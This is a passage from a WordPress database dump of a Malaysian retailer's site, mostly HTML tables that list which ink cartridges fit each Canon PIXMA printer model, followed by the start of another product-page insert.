width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:47:55','2019-09-24 08:47:55','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (3316,1,'2019-09-24 17:44:45','2019-09-24 09:44:45','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced 